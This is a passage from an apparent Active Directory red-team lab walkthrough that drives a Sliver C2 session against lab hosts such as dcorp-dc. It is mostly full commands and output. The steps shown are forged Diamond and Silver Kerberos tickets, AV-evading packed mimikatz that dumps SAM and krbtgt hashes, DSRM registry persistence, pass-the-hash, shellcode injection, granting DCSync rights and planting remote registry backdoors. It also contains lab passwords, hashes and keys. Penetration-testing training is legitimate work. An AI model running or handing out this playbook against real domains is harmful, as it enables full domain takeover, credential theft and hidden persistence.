ser:dollarcorp.moneycorp.local\studentX /credpassword:JPIzbuWHdSfq9NFr'
[*] rubeus output:
[snip]

[*] SID : S-1-5-21-719815819-3726368948-3917688648
[*] UserId : 500
[*] Groups : 520,512,513,519,518
[*] ServiceKey : 36ABEAC4022FA23F94DD8480C67B5E6E
[*] KDCKey : 36ABEAC4022FA23F94DD8480C67B5E6E
[*] Service : host

[*] Signing PAC
[*] Forged a TGS for 'Administrator' to 'rpcss/dcorp-dc.dollarcorp.moneycorp.
local'
[*] AuthTime : 1/17/2024 7:05:15 AM

[*] StartTime : 1/17/2024 7:05:15 AM
[*] EndTime : 1/17/2024 5:05:15 PM
[*] RenewTill : 1/24/2024 7:05:15 AM
[*] base64(ticket.kirbi): [snip]

To test WMI rights, we can use CIMPlant / sharp-wmi. We test execution rights my querying the
win32_process class. We can also proceed with command and shell execution using sharp-wmi.

[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'c:\windows\s
ystem32\taskhostw.exe' -t 45 '/mnt/c/AD/Tools/SharpWMI.exe' 'action=query que
ry="select * from win32_process" computername=dcorp-dc'
[*] sharp-wmi output
Scope: \\dcorp-dc\root\cimv2
Caption : System Idle Process

CommandLine :
CreationClassName : Win32_Process
CreationDate : 20220926200515.136825-420
CSCreationClassName : Win32_ComputerSystem
CSName : DCORP-DC
Description : System Idle Process
ExecutablePath :
ExecutionState :
Handle : 0
HandleCount : 0
InstallDate :
KernelModeTime : 258140468750
MaximumWorkingSetSize :
MinimumWorkingSetSize :
Name : System Idle Process
OSCreationClassName : Win32_OperatingSystem
OSName : Microsoft Windows Server 2016 Standard|C:\Wi
ndows|\Device\Harddisk0\Partition2
OtherOperationCount : 0
OtherTransferCount : 0
PageFaults : 2
PageFileUsage : 0
ParentProcessId : 0
PeakPageFileUsage : 0
PeakVirtualSize : 65536
PeakWorkingSetSize : 4
Priority : 0
PrivatePageCount : 0
ProcessId : 0
[............snip...........]
Purge all imported tickets using rubeus.

[*] Output:
Luid: 0x0

Use Domain Admin privileges obtained earlier to execute the Diamond Key attack.
Execute the Diamond Key attack

Using Rubeus
We can simply use the following Rubeus command to execute the attack. Make sure to switch back to
the dcorp-stdX session to perform the attack.
ools/Rubeus.exe 'diamond /krbkey:154cb6624b1d859f7080a6615adc488f09f92843879b
3d914cbcb5a8c3cda848 /tgtdeleg /enctype:aes /ticketuser:administrator /domain
:dollarcorp.moneycorp.local /dc:dcorp-dc.dollarcorp.moneycorp.local /ticketus
erid:500 /groups:512 /show /ptt'

[*] Got output:
[*] Action: Diamond Ticket
[*] No target SPN specified, attempting to build 'cifs/dc.domain.com'

[*] Initializing Kerberos GSS-API w/ fake delegation for target 'cifs/dcorp-d
c.dollarcorp.moneycorp.local'
[+] Kerberos GSS-API initialization success!
[+] Delegation requset success! AP-REQ delegation ticket is now in GSS-API ou
tput.
[*] Found the AP-REQ delegation ticket in the GSS-API output.
[*] Authenticator etype: aes256_cts_hmac_sha1
[*] Extracted the service ticket session key from the ticket cache: 6rZkB/3vx
jzRoxV4GhAHTMukK8DwWI2YjHAhPzdpeQA=
[+] Successfully decrypted the authenticator
doIGTTCCBkmgAwIBB[snip]
[*] Decrypting TGT

[*] Retreiving PAC
[*] Modifying PAC
[*] Signing PAC
[*] Encrypting Modified TGT
doIGZjCCBmKgAwIBBaED[snip]

We can now attempt to access any target service on dcorp-dc such as CIFS, WMI, winrm etc. In this case
we access CIFS on dcorp-dc successfully as follows.

==================================
4 04:15:02 -0800 2023
6 03:11:43 -0800 2024
Lrw-rw-rw- Documents and Settings -> C:\Users 0 B Thu Nov 1
0 21:51:26 -0800 2022
[snip]
Purge the ticket after successful access as follows.

[*] Output:
Luid: 0x0

Use Domain Admin privileges obtained earlier to abuse the DSRM credential for persistence.
Abuse the DSRM credential for persistence

Using PEzor, and Remote-sc-*
We can persist with administrative access on the DC once we have Domain Admin privileges by abusing
the DSRM administrator credentials.
We will extract the credentials from the SAM file of dcorp-dc. The Directory Services Restore Mode
(DSRM) password is mapped to the local Administrator on the DC.
Switch to the dcorp-dc session.

[server] sliver (dcorp-std_https) > sessions -i 686345ee
[*] Active session dcorp-dc_tcp (686345ee)
Let’s use PEzor in a new Ubuntu terminal to convert mimikatz.exe into donut shellcode with appropriate
arguments to dump the DSRM password from SAM (lsadump::sam) repackaged into a x86-x64 .NET
executable compatible with Slivers execute-assembly. Be sure to rename the packaged binary
accordingly.

ctuate=NA -format=dotnet -sleep=5 /mnt/c/A
D/Tools/PEzor/mimikatz.exe -z 2 -p '"privilege::debug" "token::elevate" "lsad
ump::sam" "exit"'
---------------------------------------------------------------------------
[?] Unhook enabled
[?] Fluctuate: NA
[?] Executing donut


[ File type : EXE
[ Parameters : "privilege::debug" "token::elevate" "lsadump::sam" "exit"
[ Shellcode : "/tmp/tmp.FBP9im8QfT/shellcode.cs"
[ Exit : Thread
exe.packed.dotnet.exe /mnt/c/AD/Tools/PEzor/mimikatz-sam.exe.packed.dotnet.ex
e
Back in the dcorp-dc session execute the repackaged C# mimikatz-sam.exe.packed.dotnet.exe assembly

using execute-assembly as follows.

====== ====== ============================== ======== =======================
[......snip.......]
8080 772 NT AUTHORITY\SYSTEM x86_64 svchost.exe

0
9620 772 NT AUTHORITY\SYSTEM x86_64 WmiApSrv.exe
[server] sliver (dcorp-dc_tcp) > execute-assembly -P 9620 -p 'c:\windows\syst

em32\wsmprovhost.exe' -t 45 '/mnt/c/AD/Tools/PEzor/mimikatz-sam.exe.packed.do
tnet.exe'
[*] Output:
[snip]
mimikatz(commandline) # lsadump::sam
Domain : DCORP-DC
SysKey : bab78acd91795c983aef0534e0db38c7
Local SID : S-1-5-21-627273635-3076012327-2140009870
SAMKey : f3a9473cb084668dcf1d7e5f47562659
RID : 000001f4 (500)

User : Administrator
Hash NTLM: a102ad5753f4c441e3af31c97fad86fd

RID : 000001f5 (501)
User : Guest
RID : 000001f7 (503)

User : DefaultAccount
RID : 000001f8 (504)

User : WDAGUtilityAccount
Bye!
The DSRM administrator is not allowed to logon to the DC from the network. So, we need to change the
logon behavior for the account by modifying registry on dcorp-dc. We can do this as follows using the
registry command in Sliver.
[server] sliver (dcorp-dc_tcp) > registry write --hive HKLM --type dword "Sys
tem\\CurrentControlSet\\Control\\Lsa\\DsrmAdminLogonBehavior" 2
[*] Value written to registry
We use mimikatz to pass the hash and spawn a new process as the DSRM administrator after which we
can inject our Sliver shellcode payload into this process to gain Admin access as the DSRM administrator
onto dcorp-dc.
Begin by using PEZor in a new Ubuntu terminal to create a compatible .NET to binary to perform the
pass the hash attack as follows. Make sure to rename the file accordingly.
'"sekurlsa::pth /domain:dcorp-dc /user:Administrator /ntlm:a102ad5753f4c441e3
af31c97fad86fd /run:C:\Windows\System32\cmd.exe" "exit"'
---------------------------------------------------------------------------
[?] Unhook enabled
[?] Fluctuate: NA
[?] Executing donut


[ File type : EXE
[ Parameters : "sekurlsa::pth /domain:dcorp-dc /user:Administrator /ntlm
:a102ad5753f4c441e3af31c97fad86fd /run:cmd.exe" "exit"
[ Shellcode : "/tmp/tmp.6bPGMWIvIo/shellcode.cs"
[ Exit : Thread
exe.packed.dotnet.exe /mnt/c/AD/Tools/PEzor/mimikatz-dsrm.exe.packed.dotnet.e
xe
Next, in an elevated dcorp-stdX session as shown in LO-5 perform the pass the hash process using
mimikatz-dsrm.exe.packed.dotnet.exe and make note of the process ID spawned.
If an elevated dcorp-stdX session isn’t available, it is possible to restart the AbyssWebServer service to
gain one.
[server] sliver (dcorp-std_https) > remote-sc-stop -t 45 "" AbyssWebServer
[*] Got output:
stop_service:
hostname:
SUCCESS.
[server] sliver (dcorp-std_https) > remote-sc-start -t 45 "" AbyssWebServer

[*] Got output:
start_service:
hostname:
SUCCESS.
[*] Beacon fcafe701 dcorp-std_https - 172.16.100.10:52517 (dcorp-studentX) -

windows/amd64 - Mon, 19 Feb 2024 03:49:50 PST
[server] sliver (dcorp-std_https) > use fcafe701

[*] Active beacon dcorp-std_https (fcafe701-bc63-41bb-9bfe-1f14dc12b40f)
[server] sliver (dcorp-std_https) > interactive

[*] Using beacon's active C2 endpoint: https://172.16.100.10
[*] Tasked beacon dcorp-std_https (29408b04)

[*] Session f1f4c5b8 dcorp-std_https - 172.16.100.X:52523 (dcorp-studentX) -
windows/amd64 - Mon, 19 Feb 2024 03:50:54 PST
[server] sliver (dcorp-std_https) > sessions -i f1f4c5b8

[*] Active session dcorp-std_https (f1f4c5b8)
[server] sliver (dcorp-std_https) > whoami

Logon ID: NT AUTHORITY\SYSTEM
Perform the Pass the hash process in a common SYSTEM integrity process (Svchost, taskhostw etc.) as
follows.
[server] sliver (dcorp-std_https) > ps -e taskhostw

====== ====== ============================== ======== ============= =========
[snip]
2328 676 NT AUTHORITY\SYSTEM x86_64 svchost.exe 0
2412 1340 NT AUTHORITY\SYSTEM x86_64 taskhostw.exe 0
5544 3716 NT AUTHORITY\SYSTEM x86_64 taskhostw.exe 0
Security Product(s): Windows Defender
[server] sliver (dcorp-std_https) > execute-assembly -P 2412 -p 'C:\Windows\S

ystem32\taskhostw.exe' -t 80 /mnt/c/AD/Tools/PEzor/mimikatz-dsrm.exe.packed.d
otnet.exe
[*] Output:
mimikatz(commandline) # sekurlsa::pth /domain:dcorp-dc /user:Administrator /n

tlm:a102ad5753f4c441e3af31c97fad86fd /run:C:\Windows\System32\cmd.exe
user : Administrator
domain : dcorp-dc
program : C:\Windows\System32\cmd.exe
impers. : no
NTLM : a102ad5753f4c441e3af31c97fad86fd
| PID 3320
| TID 4340
| LSA Process is now R/W
| LUID 0 ; 2925230 (00000000:002ca2ae)
\_ msv1_0 - data copy @ 0000022321D5F070 : OK !
\_ kerberos - data copy @ 00000223217189E8
\_ des_cbc_md4 -> null
\_ des_cbc_md4 OK
\_ des_cbc_md4 OK
\_ des_cbc_md4 OK
\_ des_cbc_md4 OK
\_ des_cbc_md4 OK

\_ des_cbc_md4 OK
\_ *Password replace @ 000002232170EA78 (32) -> null
Bye!
Now that we have successfully performed the Pass the hash attack and spawned a new process with
DSRM administrator privileges, we can proceed by injecting shellcode in this target process to gain its
execution context. We can use syscalls_shinject / secinject to do so.
NOTE: Attempt syscalls_shinject execution immediately after the above command, as the spawned
process closes after a short while. Attempt execution multiple times if it fails on the first attempt.
[server] sliver (dcorp-std_https) > syscalls_shinject 3320 /mnt/c/AD/Tools/Sl
iver/dcorp-std_https.bin
[*] Successfully executed syscalls_shinject (coff-loader)

[*] Got output:
Shellcode injection completed successfully!
[*] Beacon f8865911 dcorp-std_https - 172.16.100.X:50703 (dcorp-studentX) - w

indows/amd64 - Thu, 18 Jan 2024 05:05:16 PST
Switch to the new beacon session and validate DSRM administrator rights by listing admin shares on
dcorp-dc.
[server] sliver (dcorp-std_https) > use f8865911
[*] Active beacon dcorp-std_https (f8865911-780e-4f78-9fcf-a521f0b16aa2)
[*] Tasked beacon dcorp-std_https (db7cbec4)
[+] dcorp-std_https completed task db7cbec4

==================================
4 04:15:02 -0800 2023
6 03:11:43 -0800 2024
0 21:51:26 -0800 2022
[snip]

• Check if studentX has Replication (DCSync) rights.
• If yes, execute the DCSync attack to pull hashes of the krbtgt user.
• If no, add the replication rights for the studentX and execute the DCSync attack to pull hashes of
the krbtgt user.
Check if studentX has DCSync rights

Using StandIn
Enumerating for DS-Replication-Get-Changes rights using StandIn we find that our current user principal
lacks such privileges.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p "C:\windows\s
ystem32\taskhostw.exe" -t 40 '/mnt/c/AD/Tools/StandIn.exe' --object "distingu
ishedname=DC=DOLLARCORP,DC=MONEYCORP,DC=LOCAL" --access --ntaccount "dcorp\st
udentX"
[*] Output:

[?] Object : DC=dollarcorp
Path : LDAP://DC=dollarcorp,DC=moneycorp,DC=local
[+] Object properties

|_ Owner : BUILTIN\Administrators
|_ Group : BUILTIN\Administrators
[+] Object access rules
[+] Identity --> dcorp\studentX

|_ Type : Allow
|_ Permission : ReadProperty, GenericExecute
|_ Object : ANY

Add DCSync rights for studentX and execute the attack
Using StandIn and PEzor
To add DCSync rights we can use StandIn. To do so we would require Domain Admin or equivalent rights
which can be achieved using Golden / Diamond / DSRM tickets attacks as showcased in prior sections. In
this case we use the Diamond ticket attack for Domain Admin impersonation.
ools/Rubeus.exe 'diamond /krbkey:154cb6624b1d859f7080a6615adc488f09f92843879b
3d914cbcb5a8c3cda848 /tgtdeleg /enctype:aes /ticketuser:administrator /domain
:dollarcorp.moneycorp.local /dc:dcorp-dc.dollarcorp.moneycorp.local /ticketus
erid:500 /groups:512 /show /ptt'

[*] Got output:
[*] Action: Diamond Ticket
[*] No target SPN specified, attempting to build 'cifs/dc.domain.com'

[*] Initializing Kerberos GSS-API w/ fake delegation for target 'cifs/dcorp-d
c.dollarcorp.moneycorp.local'
[+] Kerberos GSS-API initialization success!
[+] Delegation requset success! AP-REQ delegation ticket is now in GSS-API ou
tput.
[*] Found the AP-REQ delegation ticket in the GSS-API output.
[*] Authenticator etype: aes256_cts_hmac_sha1
[*] Extracted the service ticket session key from the ticket cache: 8ns4pHaiE
Xmv8JLwplg+AyxM8h5cH6xJ4l2Su53S864=
[+] Successfully decrypted the authenticator
doIGTTCCBkmgA[snip]
[*] Decrypting TGT

[*] Retreiving PAC
[*] Modifying PAC
[*] Signing PAC
[*] Encrypting Modified TGT
doIGZjCCBmKgAwIB[snip]

Add DCSync rights for the dcorp\studentX user using StandIn. We use the --object argument to query
the target using its samaccountname property and use --grant for the principal to grant rights on. Use
the --type option to specify the type of rights.
[server] sliver (dcorp-std_https) > inline-execute-assembly -t 80 '/mnt/c/AD/
Tools/StandIn.exe' '--object "distinguishedname=DC=DOLLARCORP,DC=MONEYCORP,DC
=LOCAL" --grant "dcorp\studentX" --type DCSync --domain dollarcorp.moneycorp.
local'

[*] Got output:
[+] Using arguments: --object "distinguishedname=DC=DOLLARCORP,DC=MONEYCORP,D
C=LOCAL" --grant "dcorp\studentX" --type DCSync --domain dollarcorp.moneycorp
.local


[+] Set object access rules

|_ Success, added dcsync privileges to object for dcorp\studentX

Test DCSync rights using StandIn and mimikatz-dcsync.exe.packed.dotnet.exe.

ystem32\taskhostw.exe" -t 40 '/mnt/c/AD/Tools/StandIn.exe' --object "distingu
ishedname=DC=DOLLARCORP,DC=MONEYCORP,DC=LOCAL" --access --ntaccount "dcorp\st
udentX"
⠴ Executing assembly ...

[*] Output:



[+] Object access rules

|_ Type : Allow
|_ Permission : ReadProperty, GenericExecute
|_ Object : ANY

|_ Type : Allow
|_ Permission : ExtendedRight
|_ Object : DS-Replication-Get-Changes

|_ Type : Allow
|_ Object : DS-Replication-Get-Changes-In-Filtered-Set

|_ Type : Allow
|_ Object : DS-Replication-Get-Changes-All

ystem32\taskhostw.exe' -t 180 '/mnt/c/AD/Tools/PEzor/mimikatz-dcsync.exe.pack
ed.dotnet.exe'
[*] Output:
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08

ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061

Object RDN : krbtgt

** SAM ACCOUNT **

Credentials:
lm - 0: ea03581a1268674a828bde6ab09db837
[snip]

• Modify security descriptors on dcorp-dc to get access using PowerShell remoting and WMI without
requiring administrator access.
• Retrieve machine account hash from dcorp-dc without using administrator access and use that to
execute a Silver Ticket attack to get code execution with WMI.
Modify security descriptors on dcorp-dc to get access using

PSRemoting and WMI
Using PS2EXE, Sharp-wmi, RACE and Stracciatella
Since it is hard to find a C# alternative/equivalent for the RACE Toolkit, an easy workaround would be to
execute PowerShell scripts using Stracciatella or to go about converting the RACE.ps1 script into an
executable script then converting it into a .NET x86-x64 assembly compatible with the execute-assembly
command. We will be considering the latter option.
• PS2EXE.ps1:
https://raw.githubusercontent.com/MScholtes/PS2EXE/master/Module/ps2exe.ps1
The idea is to make RACE.ps1 an executable script rather than just a module script by appending
commands at the end of the module script making it executable. Next, we use PS2EXE.ps1 to convert
the new RACEex.ps1 into a C# .NET x86-x64 assembly compatible to be run by execute-assembly in
Sliver.
To enable WMI rights to allow dcorp\studentX access over a specific namespace on dcorp-dc we use the
following command from RACE.ps1.
Set-RemoteWMI -SamAccountName studentX -ComputerName dcorp-dc.dollarcorp.mone
ycorp.local -namespace 'root\cimv2' -Verbose
To enable PSRemoting rights to allow dcorp\studentX access over a specific namespace on dcorp-dc we
use the following command from RACE.ps1.
Set-RemotePSRemoting -SamAccountName "studentX" -ComputerName "dcorp-dc.dolla
rcorp.moneycorp.local" -Verbose
We create 2 executable scripts - RACEEx.ps1 and RACEExRem.ps1, namely one to add the rights and the
other to remove them. Copy Race.ps1 and rename the 2 copies to create the above ps1 files using
RACE.ps1 as a base template including all required modules.
PS C:\Windows\System32> copy C:\AD\Tools\RACE.ps1 C:\AD\Tools\RACEEx.ps1
PS C:\Windows\System32> copy C:\AD\Tools\RACE.ps1 C:\AD\Tools\RACEExRem.ps1
Append the following lines (at the end) to RACEex.ps1 to add WMI and PSRemoting rights and save it.

ycorp.local -namespace 'root\cimv2' -Verbose;
Set-RemotePSRemoting -SamAccountName studentX -ComputerName dcorp-dc.dollarco

rp.moneycorp.local -Verbose
Similarly, append the following lines (at the end) to RACEExRem.ps1 to remove the added WMI and
PSRemoting rights and save it.
Set-RemotePSRemoting -SamAccountName studentX -ComputerName dcorp-dc.dollarco
rp.moneycorp.local -Remove -Verbose;

ycorp.local -namespace 'root\cimv2' -Remove -Verbose
Next, spawn a PowerShell administrator prompt and convert both these ps1 files to a C# .NET x86-x64
assembly using PS2EXE.ps1 as follows.
PS C:\Windows\system32> .\ps2exe.ps1 -inputFile C:\AD\Tools\RACEex.ps1 -outpu
tFile C:\AD\Tools\RACEex.exe -x64 -sta
Reading input file C:\AD\Tools\RACEex.ps1

Compiling file...
Output file C:\AD\Tools\RACEex.exe written

PS C:\Windows\system32> .\ps2exe.ps1 -inputFile C:\AD\Tools\RACEexRem.ps1 -ou
tputFile C:\AD\Tools\RACEexRem.exe -x64 -sta
Reading input file C:\AD\Tools\RACEexRem.ps1

Compiling file...
Output file C:\AD\Tools\RACEexRem.exe written
Usage:
.\ps2exe.ps1 [-inputFile] <file_name> [-outputFile] <file_name> [-verbose] [-
debug]
-x64 = Compile for 64-bit runtime only
-sta = Single Thread Apartment Mode
It is also possible to perform this conversion with its GUI wrapper alternative called Win-PS2EXE.exe.
Finally, lets execute RACEex.exe with execute-assembly as follows to add WMI and PSRemoting rights to
our studentuser. Before doing so make sure to impersonate dcorp\svcadmin to get sufficient privileges
and make sure to purge the ticket after use.
psec /show /ptt'

ystem32\taskhostw.exe" -t 45 '/mnt/c/AD/Tools/RACEEx.exe'
[*] Output:
VERBOSE: Existing ACL for namespace root\cimv2 is O:BAG:BAD:(A;CIID;CCDCLCSWR
PWPRCWD;;;BA)(A;CIID;CCDCRP;;;NS)(A;CIID;CCDCRP;;;LS)(A;CIID;CCDCRP;;;AU)
VERBOSE: Existing ACL for DCOM is O:BAG:BAD:(A;;CCDCLCSWRP;;;BA)(A;;CCDCSW;;;
WD)(A;;CCDCLCSWRP;;;S-1-5-32-562)(A;;CCDCLCSWRP;;;LU)(A;;CCDCSW;;;AC)
VERBOSE: New ACL for namespace root\cimv2 is O:BAG:BAD:(A;CIID;CCDCLCSWRPWPRC
WD;;;BA)(A;CIID;CCDCRP;;;NS)(A;CIID;CCDCRP;;;LS)(A;CIID;CCDCRP;;;AU)(A;CI;CCD
CLCSWRPWPRCWD;;;S-1-5-21-1874506631-3219952063-538504511-52621)
VERBOSE: New ACL for DCOM O:BAG:BAD:(A;;CCDCLCSWRP;;;BA)(A;;CCDCSW;;;WD)(A;;C
CDCLCSWRP;;;S-1-5-32-562)(A;;CCDCLCSWRP;;;LU)(A;;CCDCSW;;;AC)(A;;CCDCLCSWRP;;
;S-1-5-21-1874506631-3219952063-538504511-52621)
ERROR: Processing data for a remote command failed with the following error m
essage: The I/O operation has been aborted because of either a thread exit or
an application request. For more information, see the about_Remote_Troublesh
ooting Help topic.
Finally re-impersonate our studentX user and test PSRemoting access using Stracciatella as follows. You
can alternately test this from a standard PowerShell prompt.
ystem32\taskhostw.exe' -t 80 /mnt/c/AD/Tools/Rubeus.exe 'asktgt /user:student
X /password:JPIzbuWHdSfq9NFr /show /ptt'

[*] Output:
[*] Action: Ask TGT
[*] Using rc4_hmac hash: 8595D70A3C150218B35AB4C32A0CF3C8

[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\studentX'
doIGKTCCBiWgAwIBBaE[snip]
ServiceName : krbtgt/dollarcorp.moneycorp.local
UserName : studentX
StartTime : 2/14/2024 7:34:17 AM
EndTime : 2/14/2024 5:34:17 PM
RenewTill : 2/21/2024 7:34:17 AM
ble, forwardable
KeyType : rc4_hmac
Base64(key) : 2gJVuqHGi+XOzlt1YgZF8g==
ASREP (key) : 8595D70A3C150218B35AB4C32A0CF3C8

ystem32\taskhostw.exe" -t 45 '/mnt/c/AD/Tools/Stracciatella.exe' '-c "Invoke-
Command -ScriptBlock {$env:username} -ComputerName dcorp-dc.dollarcorp.moneyc
orp.local"'
[*] Output:
studentX
Test WMI access using sharp-wmi / CIMPlant.

ystem32\taskhostw.exe' -t 45 '/mnt/c/AD/Tools/SharpWMI.exe' 'action=query que
ry="select * from win32_process" computername=dcorp-dc'
[*] sharp-wmi output:


CommandLine :
CreationClassName : Win32_Process
CreationDate : 20220927200512.156248-420

CSCreationClassName : Win32_ComputerSystem
CSName : DCORP-DC
ExecutablePath :
ExecutionState :
Handle : 0
HandleCount : 0
InstallDate :
[snip]
Let’s execute RACEexRem.exe with execute-assembly as follows to remove/clean up WMI and

PSRemoting rights.
psec /show /ptt'
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p "C:\windows\

system32\taskhostw.exe" -t 45 '/mnt/c/AD/Tools/RACEexRem.exe'
[*] Output:
VERBOSE: Existing ACL for namespace root\cimv2 is O:BAG:BAD:(A;CI;CCDCLCSWRPW
PRCWD;;;S-1-5-21-1874506631-3219952063-538504511-52621)(A;CI;CCDCLCSWRPWPRCWD
;;;S-1-5-21-1874506631-3219952063-538504511-52621)(A;CIID;CCDCLCSWRPWPRCWD;;;
BA)(A;CIID;CCDCRP;;;NS)(A;CIID;CCDCRP;;;LS)(A;CIID;CCDCRP;;;AU)
VERBOSE: Existing ACL for DCOM is O:BAG:BAD:(A;;CCDCLCSWRP;;;BA)(A;;CCDCSW;;;
WD)(A;;CCDCLCSWRP;;;S-1-5-32-562)(A;;CCDCLCSWRP;;;LU)(A;;CCDCSW;;;AC)(A;;CCDC
LCSWRP;;;S-1-5-21-1874506631-3219952063-538504511-52621)(A;;CCDCLCSWRP;;;S-1-
5-21-1874506631-3219952063-538504511-52621)
VERBOSE: Removing added entries
VERBOSE: Removing permissions for studentX from ACL for root\cimv2 namespace
VERBOSE: Removing permissions for studentX for DCOM
VERBOSE: The new ACL for namespace root\cimv2 is O:BAG:BAD:(A;CIID;CCDCLCSWRP
WPRCWD;;;BA)(A;CIID;CCDCRP;;;NS)(A;CIID;CCDCRP;;;LS)(A;CIID;CCDCRP;;;AU)
VERBOSE: The new ACL for DCOM is O:BAG:BAD:(A;;CCDCLCSWRP;;;BA)(A;;CCDCSW;;;W
D)(A;;CCDCLCSWRP;;;S-1-5-32-562)(A;;CCDCLCSWRP;;;LU)(A;;CCDCSW;;;AC)
Purge all tickets using rubeus.

ystem32\taskhostw.exe" -t 40 '/mnt/c/AD/Tools/Rubeus.exe' purge

Execute a Silver Ticket attack to get code execution with WMI
Using RACE, PS2EXE, Rubeus and Sharp-WMI
To retrieve the machine account hash without Domain Admin privileges, first we need to modify
permissions on the DC. The RACE toolkit has a feature that implements a new remote registry backdoor
that allows for the remote retrieval of a system’s machine account hash to further perform Silver ticket
attacks. We can use RACE toolkit along with PS2EXE to add rights to the dcorp\studentX user to retrieve
the machine account hash via execute-assembly.
The command to set permissions for dcorp\studentX to retrieve the machine account hash using
RACE.ps1 is as follows.
Add-RemoteRegBackdoor -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Trus
tee studentX -Verbose
The command to retrieve the machine account hash using RACE.ps1 after the permissions are set is as
follows is as follows.
Get-RemoteMachineAccountHash -ComputerName dcorp-dc.dollarcorp.moneycorp.loca
l -Verbose
We create 2 executable scripts - RACEEx1.ps1 and RACEEx2.ps1. Copy RACE.ps1 and rename the copies
to create the two ps1 scripts using it as a base template including all required modules.
PS C:\Windows\system32> copy C:\AD\Tools\RACE.ps1 C:\AD\Tools\RACEEx1.ps1
PS C:\Windows\system32> copy C:\AD\Tools\RACE.ps1 C:\AD\Tools\RACEEx2.ps1
Append the following lines (at the end) to RACEex1.ps1 to set permissions as dcorp\svcadmin to create a
remote backdoor to retrieve the machine account hash as dcorp\studentX. Save the ps1 file.
Add-RemoteRegBackdoor -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Trus
tee studentX -Verbose
Append the following lines to RACEex2.ps1 to retrieve the Machine account hash as dcorp\studentX.
Get-RemoteMachineAccountHash -ComputerName dcorp-dc.dollarcorp.moneycorp.loca
l -Verbose
Next, convert RACEEx1.ps1 and RACEEx2.ps1 and to a C# .NET x86-x64 assembly using PS2EXE.ps1 as
follows.
PS C:\Windows\system32> .\ps2exe.ps1 -inputFile C:\AD\Tools\RACEEx1.ps1 -outp
utFile C:\AD\Tools\RACEEx1.exe -x64 -sta
Reading input file C:\AD\Tools\RACEEx1.ps1

Compiling file...
Output file C:\AD\Tools\RACEEx1.exe written

PS C:\Windows\system32> .\ps2exe.ps1 -inputFile C:\AD\Tools\RACEEx2.ps1 -outp
utFile C:\AD\Tools\RACEEx2.exe -x64 -sta
Reading input file C:\AD\Tools\RACEEx2.ps1

Compiling file...
Output file C:\AD\Tools\RACEEx2.exe written
Execute these binaries with execute-assembly using prior impersonation as follows to add the remote
retrieval permissions and retrieve the machine account hash using studentX permissions as follows.
psec /show /ptt'

ystem32\taskhostw.exe" -t 45 '/mnt/c/AD/Tools/RACEex1.exe'
[*] Output:
[............snip............]
VERBOSE: [dcorp-dc.dollarcorp.moneycorp.local : SAM\SAM\Domains\Account] Crea

ting the trustee WMI object with user 'studentX'
VERBOSE: [dcorp-dc.dollarcorp.moneycorp.local : SAM\SAM\Domains\Account] Appl
ying Trustee to new Ace
VERBOSE: [dcorp-dc.dollarcorp.moneycorp.local : SAM\SAM\Domains\Account] Call
ing SetSecurityDescriptor on the key with the newly created Ace
VERBOSE: [dcorp-dc.dollarcorp.moneycorp.local : SAM\SAM\Domains\Account] Back
dooring completed for key
VERBOSE: [dcorp-dc.dollarcorp.moneycorp.local] Backdooring completed for syst
em
ComputerName BackdoorTrustee
------------ ---------------
dcorp-dc.dollarcorp.moneycorp.local studentX

ystem32\taskhostw.exe' -t 80 /mnt/c/AD/Tools/Rubeus.exe 'asktgt /user:student
X /password:JPIzbuWHdSfq9NFr /show /ptt'

ystem32\taskhostw.exe" -t 45 '/mnt/c/AD/Tools/RACEex2.exe'
[*] Output:
VERBOSE: Bootkey/SysKey : BAB78ACD91795C983AEF0534E0DB38C7
VERBOSE: LSA Key : BDC807FEC0BB38EB0AE338451573904220F8B69404F719BDDB0
3F8618E84005C
ComputerName MachineAccountHash
------------ ------------------

dcorp-dc.dollarcorp.moneycorp.local 36abeac4022fa23f94dd8480c67b5e6e
Use the gathered dcorp-dc machine account hash to craft a silver ticket to access the HOST and RPCSS
service to get WMI execution rights. Start by using rubeus to get and import a ticket for the HOST
service.
ystem32\taskhostw.exe" -t 45 '/mnt/c/AD/Tools/Rubeus.exe' 'silver /service:ho
st/dcorp-dc.dollarcorp.moneycorp.local /rc4:36abeac4022fa23f94dd8480c67b5e6e
/user:administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-71981581
9-3726368948-3917688648 /ptt'

[*] Building PAC
[*] SID : S-1-5-21-1874506631-3219952063-538504511
[*] UserId : 500
[*] Groups : 520,512,513,519,518
[*] ServiceKey : CDD5FA53BCF4A4E240DEA7ADD0A8E374B2764FA7ADEF1615C0A4C523
67793714
[*] KDCKey : CDD5FA53BCF4A4E240DEA7ADD0A8E374B2764FA7ADEF1615C0A4C523
67793714
[*] Service : host
[*] Signing PAC
[*] Forged a TGS for 'administrator' to 'host/dcorp-dc.dollarcorp.moneycorp.l
ocal'
[*] AuthTime : 1/23/2024 9:09:11 AM
[*] StartTime : 1/23/2024 9:09:11 AM
[*] EndTime : 1/23/2024 7:09:11 PM
[*] RenewTill : 1/30/2024 9:09:11 AM
[*] base64(ticket.kirbi): [...........snip...........]

Similarly get and import a ticket for RPCSS using rubeus.

ystem32\taskhostw.exe" -t 45 '/mnt/c/AD/Tools/Rubeus.exe' 'silver /service:rp
css/dcorp-dc.dollarcorp.moneycorp.local /rc4:36abeac4022fa23f94dd8480c67b5e6e
/user:administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-7198158
19-3726368948-3917688648 /ptt'

[*] Building PAC
[*] SID : S-1-5-21-1874506631-3219952063-538504511
[*] UserId : 500 [
*] Groups : 520,512,513,519,518
[............snip..............]

[*] Signing PAC
[*] Forged a TGS for 'administrator' to 'rpcss/dcorp-dc.dollarcorp.moneycorp.
local'
[*] AuthTime : 1/23/2024 9:10:14 AM
[*] StartTime : 1/23/2024 9:10:14 AM
[*] EndTime : 1/23/2024 7:10:14 PM
[*] RenewTill : 1/30/2024 9:10:14 AM
[............snip.... .........]
To test WMI rights over dcorp-dc, we can use sharp-wmi / CIMplant as follows.
ystem32\taskhostw.exe' -t 45 '/mnt/c/AD/Tools/SharpWMI.exe' 'computername=dco
rp-dc.dollarcorp.moneycorp.local action=query query="select * from win32_proc
ess"'
[*] sharp-wmi output:

CommandLine :
CreationClassName :
Win32_Process
